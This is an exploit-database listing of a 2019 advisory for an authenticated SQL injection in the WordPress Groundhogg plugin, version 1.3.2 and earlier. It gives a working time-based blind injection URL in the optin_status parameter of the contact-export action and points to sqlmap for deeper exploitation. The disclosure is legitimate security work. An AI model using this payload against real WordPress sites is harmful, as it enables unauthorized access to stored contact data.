Wordpress Groundhogg <= 1.3.2 Authentificated SQL Injection

2019.10.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Wordpress Groundhogg <= 1.3.2 Authenticated SQL Injection Vulnerability # Date: 23-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.groundhogg.io/ # Software Link: https://wordpress.org/plugins/groundhogg/ # Version: 1.3.2 # Tested on: Ubuntu 18.04 / Wordpress 5.3 1. Description: Wordpress Groundhogg plugin with a version lower than 1.3.2 is affected by an Authenticated SQL Injection vulnerability. 2. Proof of Concept: Authenticated SQL Injection: - Using an Wordpress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. - Sqlmap can be used to further exploit the vulnerability.

References:

https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-sql-injection-vulnerability/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top